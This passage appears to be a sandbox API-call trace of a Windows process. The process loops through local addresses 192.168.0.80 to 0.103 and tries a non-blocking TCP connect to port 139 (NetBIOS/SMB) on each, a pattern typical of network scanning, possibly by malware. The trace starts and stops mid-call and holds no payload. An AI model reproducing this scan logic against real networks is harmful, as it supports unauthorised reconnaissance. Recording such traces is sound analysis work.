readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0201.844] __WSAFDIsSet (param_1=0x5f0, param_2=0x346f960) returned 0 [0201.844] GetLastError () returned 0x0 [0201.844] SetLastError (dwErrCode=0x0) [0201.844] GetLastError () returned 0x0 [0201.844] SetLastError (dwErrCode=0x0) [0201.844] htonl (hostlong=0xc0a80050) returned 0x5000a8c0 [0201.844] inet_ntoa (in=0x5000a8c0) returned="192.168.0.80" [0201.845] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0201.845] socket (af=2, type=1, protocol=6) returned 0x600 [0201.845] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0201.845] htons (hostshort=0x8b) returned 0x8b00 [0201.845] ioctlsocket (in: s=0x600, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0201.845] connect (s=0x600, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.80"), namelen=16) returned -1 [0201.845] ioctlsocket (in: s=0x600, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0201.845] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0202.857] __WSAFDIsSet (param_1=0x600, param_2=0x346f960) returned 0 [0202.857] GetLastError () returned 0x0 [0202.857] SetLastError (dwErrCode=0x0) [0202.857] GetLastError () returned 0x0 [0202.857] SetLastError (dwErrCode=0x0) [0202.857] htonl (hostlong=0xc0a80051) returned 0x5100a8c0 [0202.857] inet_ntoa (in=0x5100a8c0) returned="192.168.0.81" [0202.857] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0202.857] socket (af=2, type=1, protocol=6) returned 0x604 [0202.858] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0202.858] htons (hostshort=0x8b) returned 0x8b00 [0202.858] ioctlsocket (in: s=0x604, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0202.858] connect (s=0x604, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.81"), namelen=16) returned -1 [0202.858] ioctlsocket (in: s=0x604, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0202.858] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0203.872] __WSAFDIsSet (param_1=0x604, param_2=0x346f960) returned 0 [0203.872] GetLastError () returned 0x0 [0203.872] SetLastError (dwErrCode=0x0) [0203.872] GetLastError () returned 0x0 [0203.872] SetLastError (dwErrCode=0x0) [0203.873] htonl (hostlong=0xc0a80052) returned 0x5200a8c0 [0203.873] inet_ntoa (in=0x5200a8c0) returned="192.168.0.82" [0203.873] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0203.873] socket (af=2, type=1, protocol=6) returned 0x618 [0203.873] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0203.873] htons (hostshort=0x8b) returned 0x8b00 [0203.873] ioctlsocket (in: s=0x618, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0203.873] connect (s=0x618, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.82"), namelen=16) returned -1 [0203.873] ioctlsocket (in: s=0x618, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0203.873] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0204.885] __WSAFDIsSet (param_1=0x618, param_2=0x346f960) returned 0 [0204.885] GetLastError () returned 0x0 [0204.885] SetLastError (dwErrCode=0x0) [0204.885] GetLastError () returned 0x0 [0204.885] SetLastError (dwErrCode=0x0) [0204.885] htonl (hostlong=0xc0a80053) returned 0x5300a8c0 [0204.885] inet_ntoa (in=0x5300a8c0) returned="192.168.0.83" [0204.885] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0204.885] socket (af=2, type=1, protocol=6) returned 0x610 [0204.885] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0204.886] htons (hostshort=0x8b) returned 0x8b00 [0204.886] ioctlsocket (in: s=0x610, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0204.886] connect (s=0x610, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.83"), namelen=16) returned -1 [0204.886] ioctlsocket (in: s=0x610, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0204.886] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0205.901] __WSAFDIsSet (param_1=0x610, param_2=0x346f960) returned 0 [0205.901] GetLastError () returned 0x0 [0205.901] SetLastError (dwErrCode=0x0) [0205.901] GetLastError () returned 0x0 [0205.901] SetLastError (dwErrCode=0x0) [0205.901] htonl (hostlong=0xc0a80054) returned 0x5400a8c0 [0205.901] inet_ntoa (in=0x5400a8c0) returned="192.168.0.84" [0205.901] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0205.901] socket (af=2, type=1, protocol=6) returned 0x620 [0205.901] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0205.901] htons (hostshort=0x8b) returned 0x8b00 [0205.901] ioctlsocket (in: s=0x620, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0205.901] connect (s=0x620, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.84"), namelen=16) returned -1 [0205.901] ioctlsocket (in: s=0x620, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0205.901] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0206.913] __WSAFDIsSet (param_1=0x620, param_2=0x346f960) returned 0 [0206.913] GetLastError () returned 0x0 [0206.913] SetLastError (dwErrCode=0x0) [0206.913] GetLastError () returned 0x0 [0206.913] SetLastError (dwErrCode=0x0) [0206.914] htonl (hostlong=0xc0a80055) returned 0x5500a8c0 [0206.914] inet_ntoa (in=0x5500a8c0) returned="192.168.0.85" [0206.914] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0206.914] socket (af=2, type=1, protocol=6) returned 0x628 [0206.914] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0206.914] htons (hostshort=0x8b) returned 0x8b00 [0206.914] ioctlsocket (in: s=0x628, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0206.914] connect (s=0x628, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.85"), namelen=16) returned -1 [0206.914] ioctlsocket (in: s=0x628, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0206.914] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0207.929] __WSAFDIsSet (param_1=0x628, param_2=0x346f960) returned 0 [0207.929] GetLastError () returned 0x0 [0207.929] SetLastError (dwErrCode=0x0) [0207.929] GetLastError () returned 0x0 [0207.929] SetLastError (dwErrCode=0x0) [0207.929] GetLastError () returned 0x0 [0207.929] SetLastError (dwErrCode=0x0) [0207.929] GetLastError () returned 0x0 [0207.929] SetLastError (dwErrCode=0x0) [0207.929] htonl (hostlong=0xc0a80056) returned 0x5600a8c0 [0207.929] inet_ntoa (in=0x5600a8c0) returned="192.168.0.86" [0207.929] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0207.929] socket (af=2, type=1, protocol=6) returned 0x634 [0207.930] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0207.930] htons (hostshort=0x8b) returned 0x8b00 [0207.930] ioctlsocket (in: s=0x634, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0207.930] connect (s=0x634, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.86"), namelen=16) returned -1 [0207.930] ioctlsocket (in: s=0x634, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0207.930] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0208.941] __WSAFDIsSet (param_1=0x634, param_2=0x346f960) returned 0 [0208.941] GetLastError () returned 0x0 [0208.941] SetLastError (dwErrCode=0x0) [0208.941] GetLastError () returned 0x0 [0208.941] SetLastError (dwErrCode=0x0) [0208.941] htonl (hostlong=0xc0a80057) returned 0x5700a8c0 [0208.941] inet_ntoa (in=0x5700a8c0) returned="192.168.0.87" [0208.941] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0208.941] socket (af=2, type=1, protocol=6) returned 0x638 [0208.942] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0208.942] htons (hostshort=0x8b) returned 0x8b00 [0208.942] ioctlsocket (in: s=0x638, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0208.942] connect (s=0x638, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.87"), namelen=16) returned -1 [0208.942] ioctlsocket (in: s=0x638, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0208.942] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0209.957] __WSAFDIsSet (param_1=0x638, param_2=0x346f960) returned 0 [0209.957] GetLastError () returned 0x0 [0209.957] SetLastError (dwErrCode=0x0) [0209.957] GetLastError () returned 0x0 [0209.957] SetLastError (dwErrCode=0x0) [0209.957] htonl (hostlong=0xc0a80058) returned 0x5800a8c0 [0209.957] inet_ntoa (in=0x5800a8c0) returned="192.168.0.88" [0209.957] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0209.957] socket (af=2, type=1, protocol=6) returned 0x650 [0209.957] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0209.957] htons (hostshort=0x8b) returned 0x8b00 [0209.957] ioctlsocket (in: s=0x650, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0209.957] connect (s=0x650, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.88"), namelen=16) returned -1 [0209.957] ioctlsocket (in: s=0x650, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0209.957] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0210.969] __WSAFDIsSet (param_1=0x650, param_2=0x346f960) returned 0 [0210.969] GetLastError () returned 0x0 [0210.969] SetLastError (dwErrCode=0x0) [0210.969] GetLastError () returned 0x0 [0210.969] SetLastError (dwErrCode=0x0) [0210.969] htonl (hostlong=0xc0a80059) returned 0x5900a8c0 [0210.970] inet_ntoa (in=0x5900a8c0) returned="192.168.0.89" [0210.970] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0210.970] socket (af=2, type=1, protocol=6) returned 0x658 [0210.970] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0210.970] htons (hostshort=0x8b) returned 0x8b00 [0210.970] ioctlsocket (in: s=0x658, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0210.970] connect (s=0x658, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.89"), namelen=16) returned -1 [0210.970] ioctlsocket (in: s=0x658, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0210.970] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0211.984] __WSAFDIsSet (param_1=0x658, param_2=0x346f960) returned 0 [0211.984] GetLastError () returned 0x0 [0211.984] SetLastError (dwErrCode=0x0) [0211.984] GetLastError () returned 0x0 [0211.984] SetLastError (dwErrCode=0x0) [0211.984] htonl (hostlong=0xc0a8005a) returned 0x5a00a8c0 [0211.984] inet_ntoa (in=0x5a00a8c0) returned="192.168.0.90" [0211.984] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0211.984] socket (af=2, type=1, protocol=6) returned 0x660 [0211.985] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0211.985] htons (hostshort=0x8b) returned 0x8b00 [0211.985] ioctlsocket (in: s=0x660, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0211.985] connect (s=0x660, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.90"), namelen=16) returned -1 [0211.985] ioctlsocket (in: s=0x660, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0211.985] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0212.997] __WSAFDIsSet (param_1=0x660, param_2=0x346f960) returned 0 [0212.997] GetLastError () returned 0x0 [0212.997] SetLastError (dwErrCode=0x0) [0212.997] GetLastError () returned 0x0 [0212.998] SetLastError (dwErrCode=0x0) [0212.998] htonl (hostlong=0xc0a8005b) returned 0x5b00a8c0 [0212.998] inet_ntoa (in=0x5b00a8c0) returned="192.168.0.91" [0212.998] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0212.998] socket (af=2, type=1, protocol=6) returned 0x668 [0212.998] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0212.998] htons (hostshort=0x8b) returned 0x8b00 [0212.998] ioctlsocket (in: s=0x668, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0212.998] connect (s=0x668, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.91"), namelen=16) returned -1 [0212.998] ioctlsocket (in: s=0x668, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0212.998] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0214.012] __WSAFDIsSet (param_1=0x668, param_2=0x346f960) returned 0 [0214.012] GetLastError () returned 0x0 [0214.012] SetLastError (dwErrCode=0x0) [0214.013] GetLastError () returned 0x0 [0214.013] SetLastError (dwErrCode=0x0) [0214.013] htonl (hostlong=0xc0a8005c) returned 0x5c00a8c0 [0214.013] inet_ntoa (in=0x5c00a8c0) returned="192.168.0.92" [0214.013] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0214.013] socket (af=2, type=1, protocol=6) returned 0x670 [0214.013] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0214.013] htons (hostshort=0x8b) returned 0x8b00 [0214.013] ioctlsocket (in: s=0x670, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0214.013] connect (s=0x670, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.92"), namelen=16) returned -1 [0214.013] ioctlsocket (in: s=0x670, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0214.013] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0215.025] __WSAFDIsSet (param_1=0x670, param_2=0x346f960) returned 0 [0215.025] GetLastError () returned 0x0 [0215.025] SetLastError (dwErrCode=0x0) [0215.025] GetLastError () returned 0x0 [0215.025] SetLastError (dwErrCode=0x0) [0215.025] htonl (hostlong=0xc0a8005d) returned 0x5d00a8c0 [0215.025] inet_ntoa (in=0x5d00a8c0) returned="192.168.0.93" [0215.025] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0215.025] socket (af=2, type=1, protocol=6) returned 0x644 [0215.026] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0215.026] htons (hostshort=0x8b) returned 0x8b00 [0215.026] ioctlsocket (in: s=0x644, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0215.026] connect (s=0x644, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.93"), namelen=16) returned -1 [0215.026] ioctlsocket (in: s=0x644, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0215.026] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0216.040] __WSAFDIsSet (param_1=0x644, param_2=0x346f960) returned 0 [0216.040] GetLastError () returned 0x0 [0216.040] SetLastError (dwErrCode=0x0) [0216.040] GetLastError () returned 0x0 [0216.040] SetLastError (dwErrCode=0x0) [0216.040] htonl (hostlong=0xc0a8005e) returned 0x5e00a8c0 [0216.040] inet_ntoa (in=0x5e00a8c0) returned="192.168.0.94" [0216.041] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0216.041] socket (af=2, type=1, protocol=6) returned 0x640 [0216.041] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0216.041] htons (hostshort=0x8b) returned 0x8b00 [0216.041] ioctlsocket (in: s=0x640, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0216.041] connect (s=0x640, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.94"), namelen=16) returned -1 [0216.041] ioctlsocket (in: s=0x640, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0216.041] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0217.053] __WSAFDIsSet (param_1=0x640, param_2=0x346f960) returned 0 [0217.053] GetLastError () returned 0x0 [0217.053] SetLastError (dwErrCode=0x0) [0217.053] GetLastError () returned 0x0 [0217.053] SetLastError (dwErrCode=0x0) [0217.053] htonl (hostlong=0xc0a8005f) returned 0x5f00a8c0 [0217.053] inet_ntoa (in=0x5f00a8c0) returned="192.168.0.95" [0217.053] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0217.054] socket (af=2, type=1, protocol=6) returned 0x67c [0217.054] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0217.054] htons (hostshort=0x8b) returned 0x8b00 [0217.054] ioctlsocket (in: s=0x67c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0217.054] connect (s=0x67c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.95"), namelen=16) returned -1 [0217.054] ioctlsocket (in: s=0x67c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0217.055] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0218.070] __WSAFDIsSet (param_1=0x67c, param_2=0x346f960) returned 0 [0218.071] GetLastError () returned 0x0 [0218.071] SetLastError (dwErrCode=0x0) [0218.071] GetLastError () returned 0x0 [0218.071] SetLastError (dwErrCode=0x0) [0218.071] htonl (hostlong=0xc0a80060) returned 0x6000a8c0 [0218.071] inet_ntoa (in=0x6000a8c0) returned="192.168.0.96" [0218.071] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0218.071] socket (af=2, type=1, protocol=6) returned 0x688 [0218.071] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0218.071] htons (hostshort=0x8b) returned 0x8b00 [0218.071] ioctlsocket (in: s=0x688, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0218.071] connect (s=0x688, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.96"), namelen=16) returned -1 [0218.071] ioctlsocket (in: s=0x688, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0218.071] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0219.082] __WSAFDIsSet (param_1=0x688, param_2=0x346f960) returned 0 [0219.082] GetLastError () returned 0x0 [0219.082] SetLastError (dwErrCode=0x0) [0219.082] GetLastError () returned 0x0 [0219.082] SetLastError (dwErrCode=0x0) [0219.083] htonl (hostlong=0xc0a80061) returned 0x6100a8c0 [0219.083] inet_ntoa (in=0x6100a8c0) returned="192.168.0.97" [0219.083] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0219.083] socket (af=2, type=1, protocol=6) returned 0x690 [0219.083] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0219.083] htons (hostshort=0x8b) returned 0x8b00 [0219.083] ioctlsocket (in: s=0x690, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0219.083] connect (s=0x690, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.97"), namelen=16) returned -1 [0219.083] ioctlsocket (in: s=0x690, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0219.083] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0220.095] __WSAFDIsSet (param_1=0x690, param_2=0x346f960) returned 0 [0220.096] GetLastError () returned 0x0 [0220.096] SetLastError (dwErrCode=0x0) [0220.096] GetLastError () returned 0x0 [0220.096] SetLastError (dwErrCode=0x0) [0220.096] htonl (hostlong=0xc0a80062) returned 0x6200a8c0 [0220.096] inet_ntoa (in=0x6200a8c0) returned="192.168.0.98" [0220.096] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0220.096] socket (af=2, type=1, protocol=6) returned 0x5d4 [0220.096] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0220.096] htons (hostshort=0x8b) returned 0x8b00 [0220.096] ioctlsocket (in: s=0x5d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0220.096] connect (s=0x5d4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.98"), namelen=16) returned -1 [0220.097] ioctlsocket (in: s=0x5d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0220.097] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0221.110] __WSAFDIsSet (param_1=0x5d4, param_2=0x346f960) returned 0 [0221.110] GetLastError () returned 0x0 [0221.110] SetLastError (dwErrCode=0x0) [0221.110] GetLastError () returned 0x0 [0221.110] SetLastError (dwErrCode=0x0) [0221.111] htonl (hostlong=0xc0a80063) returned 0x6300a8c0 [0221.111] inet_ntoa (in=0x6300a8c0) returned="192.168.0.99" [0221.111] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0221.111] socket (af=2, type=1, protocol=6) returned 0x69c [0221.111] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0221.111] htons (hostshort=0x8b) returned 0x8b00 [0221.111] ioctlsocket (in: s=0x69c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0221.111] connect (s=0x69c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.99"), namelen=16) returned -1 [0221.111] ioctlsocket (in: s=0x69c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0221.111] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0222.126] __WSAFDIsSet (param_1=0x69c, param_2=0x346f960) returned 0 [0222.126] GetLastError () returned 0x0 [0222.126] SetLastError (dwErrCode=0x0) [0222.127] GetLastError () returned 0x0 [0222.127] SetLastError (dwErrCode=0x0) [0222.127] htonl (hostlong=0xc0a80064) returned 0x6400a8c0 [0222.127] inet_ntoa (in=0x6400a8c0) returned="192.168.0.100" [0222.127] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0222.127] socket (af=2, type=1, protocol=6) returned 0x6a8 [0222.127] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0222.127] htons (hostshort=0x8b) returned 0x8b00 [0222.127] ioctlsocket (in: s=0x6a8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0222.127] connect (s=0x6a8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.100"), namelen=16) returned -1 [0222.128] ioctlsocket (in: s=0x6a8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0222.128] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0223.138] __WSAFDIsSet (param_1=0x6a8, param_2=0x346f960) returned 0 [0223.138] GetLastError () returned 0x0 [0223.138] SetLastError (dwErrCode=0x0) [0223.138] GetLastError () returned 0x0 [0223.138] SetLastError (dwErrCode=0x0) [0223.138] htonl (hostlong=0xc0a80065) returned 0x6500a8c0 [0223.138] inet_ntoa (in=0x6500a8c0) returned="192.168.0.101" [0223.138] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0223.139] socket (af=2, type=1, protocol=6) returned 0x6b4 [0223.139] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0223.139] htons (hostshort=0x8b) returned 0x8b00 [0223.139] ioctlsocket (in: s=0x6b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0223.139] connect (s=0x6b4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.101"), namelen=16) returned -1 [0223.139] ioctlsocket (in: s=0x6b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0223.139] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0224.152] __WSAFDIsSet (param_1=0x6b4, param_2=0x346f960) returned 0 [0224.152] GetLastError () returned 0x0 [0224.152] SetLastError (dwErrCode=0x0) [0224.152] GetLastError () returned 0x0 [0224.152] SetLastError (dwErrCode=0x0) [0224.152] htonl (hostlong=0xc0a80066) returned 0x6600a8c0 [0224.152] inet_ntoa (in=0x6600a8c0) returned="192.168.0.102" [0224.152] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0224.152] socket (af=2, type=1, protocol=6) returned 0x6b8 [0224.152] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0224.152] htons (hostshort=0x8b) returned 0x8b00 [0224.152] ioctlsocket (in: s=0x6b8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0224.152] connect (s=0x6b8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.102"), namelen=16) returned -1 [0224.153] ioctlsocket (in: s=0x6b8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0224.153] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0225.166] __WSAFDIsSet (param_1=0x6b8, param_2=0x346f960) returned 0 [0225.166] GetLastError () returned 0x0 [0225.166] SetLastError (dwErrCode=0x0) [0225.166] GetLastError () returned 0x0 [0225.166] SetLastError (dwErrCode=0x0) [0225.166] htonl (hostlong=0xc0a80067) returned 0x6700a8c0 [0225.167] inet_ntoa (in=0x6700a8c0) returned="192.168.0.103" [0225.167] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0225.167] socket (af=2, 